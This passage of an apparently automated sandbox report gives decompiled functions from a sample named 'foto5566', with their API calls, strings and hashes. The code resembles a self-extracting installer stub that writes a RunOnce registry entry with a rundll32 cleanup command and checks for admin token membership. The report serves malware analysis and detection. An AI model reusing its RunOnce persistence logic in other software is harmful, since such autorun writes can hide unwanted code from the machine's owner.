									E00CE171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E00CE171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E00CE681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E00CE67C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "foto5566", _t49 | _a12 | _a16);
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E00CE681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E00CE67C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "foto5566", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00CE6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x00ce44b9
0x00ce44c4
0x00ce44cb
0x00ce44d8
0x00ce44e4
0x00ce44eb
0x00ce44ee
0x00ce44ef
0x00ce44ef
0x00ce44f1
0x00ce44f7
0x00ce44f8
0x00ce467b
0x00ce44fe
0x00ce4509
0x00ce4518
0x00ce4525
0x00ce4562
0x00ce4568
0x00ce4568
0x00ce456b
0x00ce456b
0x00ce456d
0x00ce456e
0x00ce4572
0x00ce4578
0x00ce457c
0x00ce45cb
0x00ce4607
0x00ce4607
0x00ce460d
0x00ce4613
0x00ce4617
0x00000000
0x00ce461d
0x00ce4623
0x00ce4626
0x00ce4628
0x00000000
0x00ce4628
0x00ce45cd
0x00ce45cd
0x00ce45cf
0x00ce45cf
0x00ce45d2
0x00ce45d2
0x00ce45d4
0x00ce45d5
0x00ce45db
0x00ce45de
0x00ce45e3
0x00ce45e9
0x00ce45ed
0x00000000
0x00ce45f3
0x00ce45fd
0x00000000
0x00ce4602
0x00ce45ed
0x00ce457e
0x00ce457e
0x00ce4580
0x00ce4580
0x00ce4583
0x00ce4583
0x00ce4585
0x00ce4586
0x00ce458a
0x00ce458c
0x00ce458f
0x00ce458f
0x00ce4591
0x00ce4592
0x00ce459b
0x00ce459e
0x00ce45a3
0x00ce45a9
0x00ce45ad
0x00000000
0x00ce45af
0x00ce45af
0x00ce45bf
0x00ce462d
0x00ce4630
0x00ce463d
0x00ce464e
0x00ce464e
0x00ce463f
0x00ce4640
0x00ce4647
0x00ce464c
0x00000000
0x00000000
0x00ce464c
0x00ce4666
0x00ce466d
0x00ce466f
0x00ce4675
0x00ce4675
0x00ce45ad
0x00ce4527
0x00ce452e
0x00ce453f
0x00ce453f
0x00ce4530
0x00ce4531
0x00ce4538
0x00ce453d
0x00000000
0x00000000
0x00ce453d
0x00ce4554
0x00ce455a
0x00ce455a
0x00ce455a
0x00ce4525
0x00ce468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00CE4518
MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00CE4554
LocalAlloc.KERNEL32(00000040,00000065), ref: 00CE45A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 00CE45E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 00CE460D
MessageBeep.USER32(00000000), ref: 00CE4630
MessageBoxA.USER32(?,00000000,foto5566,00000000), ref: 00CE4666
LocalFree.KERNEL32(00000000), ref: 00CE466F

Part of subcall function 00CE681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00CE686E
Part of subcall function 00CE681F: GetSystemMetrics.USER32(0000004A), ref: 00CE68A7
Part of subcall function 00CE681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00CE68CC
Part of subcall function 00CE681F: RegQueryValueExA.ADVAPI32(?,00CE1140,00000000,?,?,0000000C), ref: 00CE68F4
Part of subcall function 00CE681F: RegCloseKey.ADVAPI32(?), ref: 00CE6902

Strings

LoadString() Error. Could not load string resource., xrefs: 00CE44E4
foto5566, xrefs: 00CE4545, 00CE465A

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$foto5566
API String ID: 3244514340-742867950
Opcode ID: bf4920af25179df3cceadf002233be726db2ff1d9165e6feac27002792eb40c4
Instruction ID: 17ec794297cd3ba68701e029f0303d173126b36f86a1fae04c7a9acba7c3886f
Opcode Fuzzy Hash: bf4920af25179df3cceadf002233be726db2ff1d9165e6feac27002792eb40c4
Instruction Fuzzy Hash: C6510472901299AFDB259F2ACC88BBE7B69EF45300F1441A5FD19A7241DB31DE05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00CE2773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0xce8004; // 0xd1db73d
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00CE1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E00CE658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E00CE658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0xce1140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00CE1680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00CE6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x00ce2773
0x00ce277e
0x00ce2785
0x00ce278a
0x00ce278d
0x00ce2790
0x00ce2792
0x00ce2798
0x00ce279d
0x00ce28b2
0x00000000
0x00ce27a3
0x00ce27a3
0x00ce27af
0x00ce27c2
0x00ce27c8
0x00ce27cd
0x00ce27d5
0x00ce28b7
0x00ce28b9
0x00000000
0x00ce27db
0x00ce27dd
0x00ce28aa
0x00000000
0x00ce27e3
0x00ce27e3
0x00ce27ec
0x00ce27f8
0x00ce2803
0x00ce280b
0x00ce2831
0x00ce28c3
0x00ce28c9
0x00ce28cd
0x00ce2837
0x00ce285a
0x00ce285c
0x00ce2865
0x00ce2892
0x00ce2895
0x00000000
0x00000000
0x00ce2867
0x00ce2878
0x00ce288c
0x00000000
0x00ce287a
0x00ce2880
0x00ce2885
0x00ce2897
0x00ce2899
0x00ce2899
0x00ce2878
0x00ce2865
0x00ce28a0
0x00ce28bf
0x00ce28c1
0x00000000
0x00000000
0x00ce28c1
0x00ce2831
0x00ce27dd
0x00ce27d5
0x00ce28e5

APIs

CharUpperA.USER32(0D1DB73D,00000000,00000000,00000000), ref: 00CE27A8
CharNextA.USER32(0000054D), ref: 00CE27B5
CharNextA.USER32(00000000), ref: 00CE27BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00CE2829
RegQueryValueExA.ADVAPI32(?,00CE1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00CE2852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00CE2870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00CE28A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00CE28AA
GetSystemDirectoryA.KERNEL32 ref: 00CE28B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00CE27E4

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: d1577ae984b2a44f0b28b04d0b00cd9f4ededf597c3da85f9008d456f8cbbc32
Instruction ID: 73f230bb843aa9067c4f5020f4cdcdb6c107cb8213ba6e17744053afca851b47
Opcode Fuzzy Hash: d1577ae984b2a44f0b28b04d0b00cd9f4ededf597c3da85f9008d456f8cbbc32
Instruction Fuzzy Hash: 9B41D372A001ACAFDB249B669C85BFE7BBCEF15700F0440A9F949D2140CB709E85DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE3100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00CE3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0xce8590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0xce8590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E00CE43D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0xce8d4c);
					SetWindowTextA(_t33, "foto5566");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0xce88b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E00CE30C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x00ce3108
0x00ce310b
0x00ce31b7
0x00ce31ca
0x00ce31d0
0x00ce31d0
0x00ce31da
0x00000000
0x00ce31da
0x00ce3111
0x00ce3114
0x00ce3136
0x00ce3136
0x00ce3138
0x00ce313b
0x00ce3141
0x00000000
0x00ce3143
0x00ce3116
0x00ce311b
0x00ce314b
0x00ce3151
0x00ce3158
0x00ce316a
0x00ce3176
0x00ce317d
0x00ce318b
0x00ce319e
0x00ce31a3
0x00000000
0x00ce31ad
0x00ce3120
0x00000000
0x00000000
0x00ce312a
0x00ce3134
0x00000000
0x00000000
0x00000000
0x00ce3134
0x00ce312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 00CE313B
GetDesktopWindow.USER32 ref: 00CE314B
SetDlgItemTextA.USER32(?,00000834), ref: 00CE316A
SetWindowTextA.USER32(?,foto5566), ref: 00CE3176
SetForegroundWindow.USER32(?), ref: 00CE317D
GetDlgItem.USER32(?,00000834), ref: 00CE3185
GetWindowLongA.USER32(00000000,000000FC), ref: 00CE3190
SetWindowLongA.USER32(00000000,000000FC,00CE30C0), ref: 00CE31A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00CE31CA

Strings

foto5566, xrefs: 00CE3170

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: foto5566
API String ID: 3785188418-645582358
Opcode ID: cc8a537b016aaaa38325464b015cfd16fe8b74e72ef7e48059063e6cd34628e8
Instruction ID: 33b73811aa576ea2d0170efb83e2f5a279aa7ec76eb25c4acb79c0b5ba66dbf4
Opcode Fuzzy Hash: cc8a537b016aaaa38325464b015cfd16fe8b74e72ef7e48059063e6cd34628e8
Instruction Fuzzy Hash: C111D3312042D1FFDB215F26DC8CB5E3A64FB4A721F110628F92AAA1E0DBB0B741C742

Uniqueness

Uniqueness Score: -1.00%

Function 00CE18A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00CE18A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0xce8004; // 0xd1db73d
				_v8 = _t23 ^ _t53;
				_t25 =  *0xce8128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00CE6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E00CE17EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0xce8128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0xce8128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x00ce18a3
0x00ce18a3
0x00ce18ab
0x00ce18b2
0x00ce18b5
0x00ce18be
0x00ce18c0
0x00ce18c6
0x00ce18c7
0x00ce18ca
0x00ce18cf
0x00ce19c9
0x00ce19d8
0x00ce19d8
0x00ce18df
0x00ce19b8
0x00ce19bd
0x00ce19bf
0x00ce19bf
0x00000000
0x00ce19bd
0x00ce18fa
0x00000000
0x00000000
0x00ce1912
0x00ce19aa
0x00ce19ad
0x00ce19b3
0x00000000
0x00ce1927
0x00ce1927
0x00ce1932
0x00ce1936
0x00ce19a9
0x00ce19a9
0x00000000
0x00ce19a9
0x00ce194c
0x00ce19a2
0x00ce19a3
0x00000000
0x00ce196e
0x00ce1970
0x00ce1999
0x00ce199c
0x00000000
0x00ce199c
0x00ce1972
0x00ce1972
0x00ce1975
0x00ce1984
0x00ce1985
0x00ce198a
0x00000000
0x00000000
0x00000000
0x00ce198c
0x00ce1991
0x00ce1996
0x00000000
0x00ce1996
0x00ce194c

APIs

Part of subcall function 00CE17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00CE18DD), ref: 00CE181A
Part of subcall function 00CE17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00CE182C
Part of subcall function 00CE17EE: AllocateAndInitializeSid.ADVAPI32(00CE18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00CE18DD), ref: 00CE1855
Part of subcall function 00CE17EE: FreeSid.ADVAPI32(?,?,?,?,00CE18DD), ref: 00CE1883
Part of subcall function 00CE17EE: FreeLibrary.KERNEL32(00000000,?,?,?,00CE18DD), ref: 00CE188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00CE18EB
OpenProcessToken.ADVAPI32(00000000), ref: 00CE18F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00CE190A
GetLastError.KERNEL32 ref: 00CE1918
LocalAlloc.KERNEL32(00000000,?,?), ref: 00CE192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00CE1944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CE1964
EqualSid.ADVAPI32(00000004,?), ref: 00CE197A
FreeSid.ADVAPI32(?), ref: 00CE199C
LocalFree.KERNEL32(00000000), ref: 00CE19A3
CloseHandle.KERNEL32(?), ref: 00CE19AD

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: cce650728f4a4843ca23eb838fefde58bfc79b9e7524fd1448c10fd4c93a7ea9
Instruction ID: f71fa54928d62a9a685431a69dc3013fa19097afcd71a1827ea49927cc4a8c9a
Opcode Fuzzy Hash: cce650728f4a4843ca23eb838fefde58bfc79b9e7524fd1448c10fd4c93a7ea9
Instruction Fuzzy Hash: A3314D71A00289AFDB109FA6DC88BBFBBBCFF04710F140429E956E6151DB309A15DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2267 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00CE2267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0xce8004; // 0xd1db73d
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0xce8530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, 0xce8530, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E00CE658A( &_v268, 0x104, 0xce1140);
							}
							_push("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
							E00CE171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, 0xce8530, 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00CE6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x00ce2272
0x00ce2277
0x00ce2279
0x00ce2283
0x00ce2289
0x00ce22ab
0x00ce22b1
0x00ce22c4
0x00ce22e0
0x00ce22e6
0x00ce22f5
0x00ce230d
0x00ce231c
0x00ce231c
0x00ce2321
0x00ce233a
0x00ce2342
0x00ce2348
0x00ce234b
0x00ce234c
0x00ce234c
0x00ce234e
0x00ce234f
0x00ce236e
0x00ce236e
0x00ce237a
0x00ce2380
0x00ce2380
0x00ce2381
0x00ce2381
0x00ce238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00CE22A3
RegQueryValueExA.ADVAPI32(?,00CE8530,00000000,00000000,?,?,00000001), ref: 00CE22D8
memset.MSVCRT ref: 00CE22F5
GetSystemDirectoryA.KERNEL32 ref: 00CE2305
RegSetValueExA.ADVAPI32(?,00CE8530,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00CE236E
RegCloseKey.ADVAPI32(?), ref: 00CE237A

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00CE2321
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00CE2299
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00CE232D

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
API String ID: 3027380567-320738910
Opcode ID: 0843dd745c2fdf4e1407a2b62fd8b586455538fd5a4a7788f25395b9f44defbd
Instruction ID: b0d937b270eaec7652cda76f546debbcba84353337b8595af334e6faa98adc43
Opcode Fuzzy Hash: 0843dd745c2fdf4e1407a2b62fd8b586455538fd5a4a7788f25395b9f44defbd
Instruction Fuzzy Hash: 7931D771A00298ABDB21DB52DC89FEF7B7CEF14750F0401E9B50DAA051EA75AF88CE50

Uniqueness

Uniqueness Score: -1.00%

Function 00CE468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00CE468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x00ce4699
0x00ce469b
0x00ce46a9
0x00ce46af
0x00ce46b4
0x00ce46bc
0x00ce46f9
0x00000000
0x00ce46f9
0x00ce46d9
0x00ce46dd
0x00000000
0x00000000
0x00ce46e5
0x00ce46ef
0x00000000
0x00ce46f5
0x00ce46ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00CE46A0
SizeofResource.KERNEL32(00000000,00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00CE46C3
LoadResource.KERNEL32(00000000,00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46CC
LockResource.KERNEL32(00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46D3
memcpy_s.MSVCRT ref: 00CE46E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46EF

Strings

TITLE, xrefs: 00CE469D, 00CE46C0
foto5566, xrefs: 00CE46E4

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$foto5566
API String ID: 3370778649-3539812973
Opcode ID: 38b69dc3d3644133727acd4e33d895ab6fedfc7a6178a39349888eb000355591
Instruction ID: f7171743bbcd99d7636f73368def7a5c30f0492a4812c15bbc80639fb11b1e66
Opcode Fuzzy Hash: 38b69dc3d3644133727acd4e33d895ab6fedfc7a6178a39349888eb000355591
Instruction Fuzzy Hash: E301A9362443907FE7201BA65C8EF6F7E2CDBCAF61F054014FA4A9B150C971994186B6

Uniqueness

Uniqueness Score: -1.00%

Function 00CE17EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00CE17EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0xce8004; // 0xd1db73d
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
